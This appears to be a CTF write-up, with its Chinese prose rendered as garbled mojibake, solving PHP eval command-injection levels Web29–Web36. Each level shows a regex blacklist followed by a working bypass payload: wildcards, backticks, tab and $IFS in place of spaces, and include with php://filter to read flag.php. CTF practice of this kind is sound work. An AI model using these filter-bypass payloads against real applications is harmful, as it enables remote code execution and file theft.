I"î6<h3 id="web29">Web29</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
    <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
    <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
        <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
    <span class="p">}</span>
    
<span class="p">}</span><span class="k">else</span><span class="p">{</span>
    <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è‚¥è‚ ç®€å•çš„ä¸€ä¸ªå‘½ä»¤æ‰§è¡Œï¼Œç»•è¿‡flagé»‘åå•å°±è¡Œï¼Œå¯ä»¥ä½¿ç”¨linuxçš„é€šé…ç¬¦<code class="language-plaintext highlighter-rouge">*</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=system('cat fla*');
</code></pre></div></div>

<p>éœ€è¦æ³¨æ„çš„æ˜¯è¿™ä¸ªflagå¹¶ä¸ä¼šå›æ˜¾ï¼Œéœ€è¦æŸ¥çœ‹æºä»£ç æ‰èƒ½å¤Ÿçœ‹åˆ°(è¿™é‡Œè¿˜å¡äº†åŠå¤©)ã€‚</p>

<h3 id="web30">Web30</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿™æ¬¡banæ‰äº†system()å‡½æ•°ï¼Œæ‰€ä»¥æ¢ä¸€ä¸ªå‡½æ•°å°±å¥½</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=echo `cat fla*`;
</code></pre></div></div>

<h3 id="web31">Web31</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿™æ¬¡banæ‰äº†catï¼Œè¿˜æœ‰ç©ºæ ¼ã€.è¿™äº›å¸¸ç”¨çš„å‘½ä»¤å’Œå­—ç¬¦ï¼Œæ‰€ä»¥è¦è€ƒè™‘ç©ºæ ¼çš„ç»•è¿‡ã€‚</p>

<p>ç©ºæ ¼çš„ç»•è¿‡æ–¹æ³•ä¹Ÿæ˜¯è€ç”Ÿå¸¸è°ˆäº†(è™½ç„¶åˆ°ç°åœ¨æˆ‘éƒ½æ²¡è®°å‡ ä¸ªï¼Œ<del>å‘œå‘œæˆ‘çœŸæ˜¯ä¸ªåºŸç‰©</del>)</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>åœ¨linux ç©ºæ ¼å¯ä»¥ç”¨ä»¥ä¸‹å­—ç¬¦ä¸²ä»£æ›¿ï¼š
 %09(tab)ã€$IFS$9ã€ $ã€{IFS}ã€$IFS%09(tab)ã€&lt; ã€&lt;&gt;ã€%20(space)ç­‰
 // æŠ„è‡ªç¾½å¸ˆå‚…åšå®¢
</code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=echo%09`more%09fla*`; //ä¹Ÿå¯ä»¥æŠŠ%09æ¢æˆå…¶ä»– moreæ¢æˆless
</code></pre></div></div>

<h3 id="web32">Web32</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>åˆbanæ‰äº†`ï¼Œechoï¼Œè¿˜æœ‰æ‹¬å·ï¼Œè¿™æ—¶å€™å°±è¦æƒ³phpä¸­ä¸é€‚ç”¨æ‹¬å·çš„å‡½æ•°äº†</p>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">echo</span>
<span class="k">print</span>
<span class="k">die</span>
<span class="k">include</span>
<span class="k">require</span>
<span class="k">include_once</span>
<span class="k">require_once</span>
</code></pre></div></div>

<p>è¿™é¢˜ä¸ä¼šåšï¼Œå»ç½‘ä¸Šçœ‹å¸ˆå‚…ä»¬çš„wpï¼Œå‘ç°æ˜¯ä½¿ç”¨includeå†™è¿›å»é©¬ï¼Œç„¶åç”¨ä¼ªåè®®è¯»å–æ–‡ä»¶(<del>å‘œå‘œ</del>)ã€‚</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=include"$_POST[noob]"?&gt;
noob=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre></div></div>

<p>loadåœ°å€çš„æ—¶å€™ï¼Œè¦æŠŠ<code class="language-plaintext highlighter-rouge">?c=include"$_POST[noob]"?&gt;</code>åŠ ä¸Š</p>

<h3 id="web33">Web33</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|</span><span class="se">\"</span><span class="s2">/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿‡æ»¤äº†åŒå¼•å· ç”¨ä¸Šä¸€é“é¢˜çš„payloadå»é™¤åŒå¼•å·å³å¯</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=include$_POST[noob]?&gt;
noob=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre></div></div>

<h3 id="web34">Web34</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|</span><span class="se">\"</span><span class="s2">/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿‡æ»¤äº†<code class="language-plaintext highlighter-rouge">:</code>ï¼Œç„¶è€Œå¹¶æ²¡æœ‰ä»€ä¹ˆåµç”¨</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=include$_POST[noob]?&gt;
noob=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre></div></div>
<h3 id="web35">Web35</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|</span><span class="se">\"</span><span class="s2">|\&lt;|\=/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿‡æ»¤äº†<code class="language-plaintext highlighter-rouge">&lt;</code>ï¼Œç„¶è€Œå¹¶æ²¡æœ‰ä»€ä¹ˆåµç”¨</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=include$_POST[noob]?&gt;
noob=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre></div></div>

<h3 id="web36">Web36</h3>

<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">])){</span>
  <span class="nv">$c</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'c'</span><span class="p">];</span>
  <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nb">preg_match</span><span class="p">(</span><span class="s2">"/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|</span><span class="se">\"</span><span class="s2">|\&lt;|\=|\/|[0-9]/i"</span><span class="p">,</span> <span class="nv">$c</span><span class="p">)){</span>
    <span class="k">eval</span><span class="p">(</span><span class="nv">$c</span><span class="p">);</span>
  <span class="p">}</span>

<span class="p">}</span><span class="k">else</span><span class="p">{</span>
  <span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>è¿‡æ»¤äº†<code class="language-plaintext highlighter-rouge">æ•°å­—</code>ï¼Œç„¶è€Œå¹¶æ²¡æœ‰ä»€ä¹ˆåµç”¨</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>payload:?c=include$_POST[noob]?&gt;
noob=php://filter/read=convert.base64-encode/resource=flag.php
</code></pre></div></div>

:ET